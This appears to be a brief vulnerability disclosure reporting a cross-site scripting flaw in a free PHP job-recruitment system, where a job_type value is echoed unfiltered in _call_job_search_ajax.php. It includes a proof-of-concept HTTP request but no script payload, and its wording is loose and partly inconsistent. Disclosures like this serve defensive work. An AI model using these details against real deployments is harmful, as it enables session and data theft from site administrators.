xss-1_27.md

job-recruitment-in-php has Cross Site Scripting vulnerability in _call_job_search_ajax.php

supplier

https://code-projects.org/job-recruitment-in-php-css-javascript-and-mysql-free-download/

Vulnerability file

_call_job_search_ajax.php

describe

echo $job_type parameter in _call_job_search_ajax.php , There is a cross-site scripting attack vulnerability in Job-recruitment system. The parameter that can be controlled is: $sch . A malicious attacker can obtain sensitive information about administrators.

Code analysis

get $row["job_type"] as $job_type from job_post table.

Splicing the $jobotype parameter into the $rjoblist in no filter.

At the end, echo $rjoblist in no filter. cause xss vulnerbility.

POC

GET /_parse/_call_job_search_ajax.php?n=0 HTTP/1.1
Host: airecruitmentsystem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://airecruitmentsystem/_parse/_call_job_search_ajax.php?n=0
Cookie: PHPSESSID=j0krbh2rm8nvlgvuibsssks05d
Upgrade-Insecure-Requests: 1
Priority: u=0, i

Result